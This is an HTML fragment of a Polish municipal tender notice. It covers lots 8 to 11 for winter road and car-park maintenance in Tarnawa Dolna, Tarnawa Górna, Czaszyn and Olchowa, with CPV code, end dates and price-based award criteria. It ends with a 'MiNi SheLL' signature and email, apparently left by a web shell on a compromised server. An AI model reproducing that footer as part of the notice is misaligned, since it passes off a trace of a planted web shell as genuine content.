<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> zimowe utrzymanie dróg i parkingów na terenie miejscowości Tarnawa
                                      	Dolna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 8 - obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Tarnawa
                                      	Dolna.
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> zimowe utrzymanie dróg i parkingów na terenie miejscowości Tarnawa
Górna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 9 - obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Tarnawa
Górna.

Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> zimowe utrzymanie dróg i parkingów na terenie miejscowości Czaszyn..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 10 - obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Czaszyn. 
                           
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zimowe utrzymanie dróg i parkingów na terenie miejscowości Olchowa..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 11 - 	obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Olchowa.                 
                                 
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com